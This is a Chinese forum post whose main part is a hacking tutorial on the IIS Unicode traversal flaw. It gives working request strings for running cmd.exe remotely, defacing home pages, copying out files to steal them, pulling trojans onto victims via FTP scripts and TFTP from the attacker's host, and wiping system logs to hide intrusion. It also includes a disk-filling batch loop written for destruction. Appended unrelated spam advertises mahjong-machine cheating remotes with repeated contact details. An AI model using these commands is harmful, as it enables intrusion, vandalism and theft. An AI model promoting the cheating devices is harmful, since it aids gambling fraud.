下面讲解端口的使用步骤

首先我们我们要找一台主机来练手，随便挑吧！www.bigner.com(乱说的)第一部，呵呵， 先在ie里看看吧，mmmm.....做的还行，挺精致的！主要是我们肯定了它现在是正常的。 然后， 我们应该知道它的ip,很简单，ping它一下就可以了。ping http://www.bigner.com，看看窗口里有了什么？是不是有三行回应，其中的111.111.222.222就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，第一，你打错命令了；第二，该主机装了防火墙禁止ping,不过这种可能很小。知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值

21--ftp 重要哦

23--telnet 欢呼吧

25-smtp 尽管重要，但似乎没什么可利用的 53--domain 同上

79--finger 可知道用户信息了

80--http 要看网页，没它不行吧

110--pop 收信的

139--netbios 共享用的，很有利用价值哦

3389--win2000超级终端 呵呵，这个好！

其实端口有上千种，这些最最常用我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!）那么我们该如何应对呢？ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）

若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scan flux等吧！反正，有ftp就有一份希望telnet在！好!telnet 111.111.222.222，出现窗口了吧！嗯？要密码？看来网管还不是超级白痴：）随便猜个，错了，闪人！

二，一切从基础开始

由于winntsystem32cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞） 11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

如果成功，那么在浏览区可看到如下信息：

Directory of C:inetpubscripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

是不是有自己机器的感觉了，正点！就是这种感觉！

cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

http://11.11.22.22/msadc/......t/system32/cmd.exe?/c+dir （这个命令同样道理）

大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe

会dos的朋友一定懂其意义了，不懂的请去看书 .

不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

三，实战演练

1，修改主页！（是不是很爽？）

一般主页位置在c:inetpubwwwroot下，但要是改了路径，就需要找找了。

最方便的方法：在浏览器里输入 http://11.11.22.22/.ida要是有漏洞，那在浏览器里 便会显示主页路径，这个漏洞存在率很高，自然是我们的首选。

分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入这条命令dir c:iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm 那么我们就修改它吧！

最方便的方法：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:autoexec.bat 就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm 回应为：HTTP 500 - 内部服务器错误 通过对cmd的分析，袁哥得出一条简便的方法，加入"符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:inetpubwwwrootindex.htm

回应为：cgi错误，不用理会

两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧 而在实际操作中，可能袁哥的方法也会失效，这时，我们就可以copy cmd.exe为另一个exe，记住路径，用copy后的来echo

例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm

2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，

那就应该用改好的主页上传，这个我们后面介绍。

几点忠告：

1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德

2，echo前记得帮他们做好备份

3，不准在主页里加入恶性语句

2，下载文件

要是有什么有用的文件被你发现，那我们如何下载呢？ 最简单的方法：把文件copy至网页目录下。copy c:emailbaby.eml c:inetpubwwwrootbaby.zip,然后， 下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。 别的方法：对不起，没想好：）

3，最重要的上传

一般方法：ftp法

首先建一个ftp脚本文件：c:hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

echo+open ftp.cshu.com（ftp主机） > c:hehe.haha

echo+user yourname >> cc:hehe.haha (yourname是用户名)

echo+yourpasswd >> c:hehe.haha (yourpasswd是密码)

echo+get setup.exe >> c:hehe.haha 要下载的文件

echo+quit >> c:hehe.haha

完了以后：ftp+/s:c:hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe

就会出现在当前目录了（也就是cmd所在目录）

别忘了先上传到ftp主机，不要做马大哈哦！

最简单的方法：tftp法。

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，

利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：）

安装好后运行，别忘了设置好默认目录，否则会找不到文件 tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:winntihateu.exe（ihateu.exe在默认目录里） 1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！ 学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）

4，如何清除痕迹

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！

C:winntsystem32logfiles*.*

C:winntssytem32config*.evt

C:winntsystem32dtclog*.*

C:winntsystem32*.log

C:winntsystem32*.txt

C:winnt*.txt

C:winnt*.log

全……擦掉！

四，细节问题。

1，遇到长文件名怎么办？

c:program files

就用c:"program20%files"

2，遇到空格怎么办？

20%代替喽，或者xx yy=xxyy~1

3,如何做个很大的文件？

目的就是破坏啦！我不喜欢不过教教你们啦

@echo off

echo big > c:a.a

:h

copy c:a.a+c:a.a c:a.a

goto h

注意不要乱来啊！

4，输入命令，没反应或反应不对。

：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！

看在你看到这里那么给我面子的份上，在给你几个吧！

http://www.exsample.com/m......ystem32/cmd.exe?/c+dir+c: 或http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c: 或http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:

不一定有用哦！

5，如何找到unicode漏洞的主机

呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：）

不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！

  Js、Chen：SF自己坐

板凳

      ◣精创◥ QQ:182272109 电话： 13055329444 麻将机破解技术帖子被删打不开请点击↘『百度快照』↙ QQ:182272109 TEL:13055329444 通过 EMS 三天到货， <  ◣精创◥ QQ:182272109 电话： 13055329444 麻将机破解技术帖子被删打不开请点击↘『百度快照』↙ QQ:182272109 TEL:13055329444 通过 EMS 三天到货。无效全额退款】 ←赢钱  ↗ ★ ↘麻将机破解技术↖  ↗━  联系人◇王先生 → 智慧的人掌握机会，愚蠢的人失去机遇，机遇犹如守业，先知先觉你守业者，后知后觉你职业者，不知不觉你就是消费者】↙ ★ ↘麻将机保单分析仪器【提高前辈科技 — 领先科技 - 引领潮流】提高前辈科技以实力 科技 打造经典本公司以服务求信誉，以质量求发展；一次是朋友，永远是朋友。敬告：泛博娱乐界朋友 ∶ 目前市场上还没有任何普通扑克、普通麻将、普通瓷碗杯、竹筒等都能直接看穿的隐形透视眼镜，千万不要由于天花乱坠和漫山遍野的豆腐块广告和好奇心而上当受骗。喝泉水找源头，买产品找厂家，那样才干有质量和售后服务的保证, 用新奇实用的产品赢得您的信赖，您用我产品上风赢得天下。具体请联系公司在线客服咨询电话： 13055329444
目前网络上泛起的真人麻将机， < 目前网络上泛起的真人麻将机。大概有几十种，都以自己是最正规，最公平标榜。玩家都是输钱，输大赢小，最后血本无归。这些假公司、、土庄、黑庄骗人手法都差未几。 看到这里， < 看到这里。大家应该明白了吧，既然洗牌机可以有假，网上麻将机作假不是更利便，那些所谓的现场视频，完全可以通过电脑合成，再通过程序完美的结合！庄闲可以任意！输赢就在举手之间！网上麻将机可以通过过程控制赌博结果，投注的赌客根本别想赢钱，而庄家却在大肆获取不法收益。完全对网上麻将机绝望了假如世界上有百分百公平的游戏，赌场早就倒了仅仅是一个小小的电脑顺序，就可以将所有赌注玩弄于手掌之间。
登录互联网， < 登录互联网。搜索 “ 真人麻将机 ” 一下子搜索出 45000 多条相关信息，良多都是出卖 “ 真人麻将机 ” 游戏软件的随意联系了其中一家，对方表示可提供麻将机、现场麻将机、真人麻将机、视讯麻将机等多种麻将机游戏软件，并可根据客户的要求开发各种不同麻将机游戏软件程序！最后商定面谈，地址在广西柳州。去了那里，一切的真相昭然若揭。那里的有一条街都是卖这种软件的普通的一套麻将机软件 5 万块就可以买到一套真人麻将机软件 10 几万就可以搞定，还可以按照你要求量身定做一套程序，保证做的比真人还要逼真！那时胜利地让他相信了想靠这套软件发财致富，很等闲地了解到其它一些内幕。告诉我广州番禺，那里的高科技赌博作假工具更提高前辈，可以买到任何你想要的形形色色的网上麻将机赌场良多，所以完全可以注册一个域名，随着何博士等信誉较好的网上赌博公司差未几的就可以开始营业，等着收钱了 ,麻将机自夸为世界上最公平的游戏， < 麻将机自夸为世界上最公平的游戏。但网上真人麻将机的可托度到底有多大呢？一路追到这里，对赌博已经没多大爱好了决定探查到底！


『爆料 - 网上真人麻将机的作弊内幕』
∝╬══ → 提高前辈科技 QQ:182272109 电话： 13055329444

┏═════════════════════┑┌════┒

┃麻将机破解技术⊕QQ：182272109 TEL:13055329444⊕信誉保障┃

┖═════════════════════┘┕════┛
∝╬══→先进科技Q Q：182272109 电话：13055329444
随着现在的每个人的生活水平有所提高。每个人都过的很和谐和平安的生活。可随着现在的科技越来越先进。从早期时代打麻将机的时候，不叫打麻将 。而是玩“麻雀"随着生活的水平的大大提高了。有的人当上大老板有的人当上了上班族，等等 就是因为得种种原因，就是因为时间的太过充沛，每个人下班时间，不知道要干什么，觉得现在的生活很平凡，觉得要找个事情做，这样人生才过的比较有滋有味。一开始肯定不会接触赌博这块，随着生活越来越好朋友也越来越多了，有的朋友是不懂得赌博，只知道平凡的过日子，有的人几乎是赌博为生的。但是觉得自己的生活过的太过平凡，有的人就会想着试试去玩下赌博。去了解下，但是毕竟是赌博一开始的时候肯定是赢钱，随之时间的逝世，觉得赌博才是真正的人生 ，赚钱也比什么多快，种种原因就迷上了赌博，打麻将。一迷上赌博觉得怎么样大家也找到怎么样。 你尽然你想赌博，那就靠你的头脑去赌，现在什么时代了。难道还沉迷在所谓的赌圣，赌王之类的这些话，我说每位赌博爱好者，可能是现在科技发达 ，电影看的也多了吧。赌王 、 赌圣那只是一个传说，这个世界在你没有亲眼见过的情况下什么都是假， 现在是科技时代，要赌是在赌科技，不是在运气。有的人说，我今天运气好，赢了几千 几万， 很开心的样子，赌博爱好者 用你们清醒的头脑想想吧，要是你不让你们这些赌博爱好者，吃点甜头的话，你们会来赌吗，你们会迷上这种赌博吗。没有你们这些赌博的人，他们开场子让你赌的吃什么，靠什么吃饭。这个社会就是一个食物链，你吃我我吃你一样的，但是你不被人吃的饭，你必须吃别人。心存善念的人往往做不了什么大事情，开赌博场子的人都是心狠手辣的不管你有钱没钱，只要你去玩的你就是准备输钱，没钱的话找场子老板借。借钱算利息，俗话说，利滚利 早晚压死你。没钱发的话，要么找你家人，要么对你的人身安全造成严重的伤害，有时候你要赌博，就是带着一家人在赌博， 你赢钱便没事，你输钱全家都得遭殃。好了废话不多说吧说说麻将机作弊器，怎么操作怎么玩怎么作弊。先进科技领先科技，引领潮流。Q Q：182272109 电话：13055329444

┏═════════════════════┑┌════┒

┃麻将机破解方法⊕QQ：182272109 TEL:13055329444⊕信誉保障┃

┖═════════════════════┘┕════┛
最新自动麻将机作弊程序：
就是遥控器、自动麻将机的真假？这个题目在多年的销售过程中被顾客问及不下万遍，好多客户在遥控器、自动麻将桌上一直围绕着一个题目。相互先容购买的立马下定金订购；有的一直无可置疑，怕东怕西，无非也就围绕着 2 个题目点，一是下定金不发货怎么办，二是产品万一泛起题目不让退换怎么办？对于料理货到付款的客户，购买的本公司的任何一款产品，请先付 10% 订金，公司才干正常给你出货。公司面临的全国的客户，下订金是防止客户恶意下订单。用一百个 Q 一百个电话，一百个地址。公司岂非去给你发一百个没邮费保障的货吗？那样公司一天要损失多少。所以请有诚意购买的新老客户，为促进大家的合作。请在所订购的产品出货前去下个 10% 订金，已保证你需要的货能正常出货，以免在出货前被冻结。二是仪器出货前都有经由严格的检测的测试用度当然也要先保障住。第一点就是做为信誉的保证了这也是行业的划定。不是骗子公司，也不是专业骗取定金不发货的公司，网站里都有更新天天的发货记实，买家可以登陆中国邮政网站查询货单号，当日订购下定金，第二天提供货单号查询跟踪货物运送情况。 3 天内到达全国所在地。海峡郑重许诺：从顾客收货当日算起，产品在 3 天内包退换。
许诺：说一不二！说到做到深知：实战的产品， < 深知：实战的产品。良好的售后服务，才干赢得与您的继续性发展。
共创双赢，期待：与您的进一步合作。有您的珍贵意见，会开发出更新、更奇、更实战的产品。
◥ █ █ █ ██████████◤ ～      本产品只限用于娱乐 , < ◥ █ █ █ ██████████◤ ～      本产品只限用于娱乐 . 严禁用于非法用途否则后果自负。
． ◥ 韩国入口 █ ██████████◤                这就是机会！
已经胜利了 ◥ █ ▅ ▅ █ █ ▅ ▅ ██▅▅▅▅▅███◤            当别人购买的情况下。
已经购买了 ．．．．▍▍． .. █▍ ☆ ∵ ..../                        当别人知道的情况下。
知道了 ∴                                                                                  当别人不知道的情况下。
品质卓越】满意常乐】言而有信】财源广进】      什麽叫做机会？ █〓██▄▄▄▄▄▄

客服 QQ:182272109 业务电话： 13055329444 刘先生
EMS 三天到货，  三、交货期承诺 :1 仪器交货期：按用户要求。顺丰空运 1 天到货！ 2 先打订金，货到付款。四、售后服务许诺： 1 服务宗旨：快速、自动麻将机作弊器◣◣坚决、正确、殷勤、完全 2 服务目标：服务质量赢得用户满足 3 服务效率：保修期内或保修期外如设备泛起故障，供方在接到通知后，维修职员在五个工作日内给予处理五、服务原则：产品保修期为三个月，保修期内供方将免费维修和更换属质量原因造成的零部件损坏，保修期外零部件的损坏，提供的配件只收本钱费，由需方人为因素造成的设备损坏，供方维修或提供的配件均按本钱价计。保修期外我公司技术职员每年不少于三次回访调查用户使用情况。 系统的选材均选用海内或国际优质产品。 2 平等竞争前提下，  二、仪器价格许诺： 1 为了保证仪器的高可靠性和提高前辈性。公司在不以降低仪器技术机能、更改仪器部件为代价的基础上，真诚以最优惠的价格提供应贵方。
现做现卖，  一、仪器质量许诺： 1 为了给顾客更好的保证。根据顾客的要求现做仪器，然后到场子试机调试好再发货。 2 仪器质量我给予 3 个月免费保修，一年免费更新 3 次的许诺！ 提高前辈科技许诺： ∝╬══ → 提高前辈科技 Q Q 182272109 电话： 13055329444
只要针对你那边的什么弄法。都可以自己设定。简朴的意思说，自动麻将机的作弊顺序很简朴。想什么牌就有什么牌，想输就输，想赢就赢的
变成了自动洗牌。自动麻将机都是由里面那个自动洗牌的主板芯片，以前的自动麻将机是手动洗牌的现在科技发达。来进行操纵，运行。现在卖自动麻将机的也良多人，要是认为客户去问麻将机是怎么样的作弊的那个老板可能会告诉你说必需在麻将机里面安装程序才能作弊的实在每个客户你健忘的一点要是卖麻将机的同样会这样说，究竟他卖麻将机的肯定会跟你说要安装什么作弊程序 这样你买他麻将机才能使用的安心，不然被人作弊了自己还敢使用那台麻将机吗？还敢在去麻将机吗？道理同样的简朴，要想安装的话 那个老板会再收的装置用度的前段时间接到良多的客户来问说麻将机有没有不用安装程序，直接一个遥控器就能使用的由于究竟是他人的麻将机上玩的总不可能在他人的麻将机上作四肢举动吧，这样多不利便啊。所以我对每个客户的需要进行研究。对麻将机深切的解，经由一段时间的研究，终于研究发现实在只要把麻将机的主板芯片的顺序，输入在遥控器里面，就能对麻将机进行控制，然而有良多人怀疑说怎么有可能说这样的一个简简朴单的遥控器就能控制麻将机程序，感到很纳闷，有点想相信，又有点不敢相信。只能这么跟你每个客户说，只有你想不到没有什么做不到提高前辈科技领先的科技产品不只是麻将机这块，中国的市场上我诚信团体的电子科技产品是最提高前辈。海内只有我一家而已，假如你戒不掉赌博。又什么不发点钱。体验一下新科技的产品，否能为你带来利益，但是想告诉每位赌博兴趣者，满意常乐 “ 好。麻将机最新破 解程序 不需要在对方的麻将机做四肢举动。只要你使用诚信团体的自动麻将机作弊遥控器，带的利益可想而知，诚信团体，以诚信经营。做到客户第一，利益第二。 Q Q 182272109 电话： 13055329444
∝╬══ → 提高前辈科技 Q Q 182272109 电话： 13055329444
交易是小，做人是大 诚信交易，一诺千金 信用是金，材富是银 良心道德，铸就诚信 
  欢迎大家来电咨询订购：电话：13055329444 联系 QQ:182272109
交易事小.做人事大┼─ ─┼-诚信交易.一诺千金┼─ ─┼-信用是金,财富是银┼─ ─┼-良心道德,铸就诚信┼─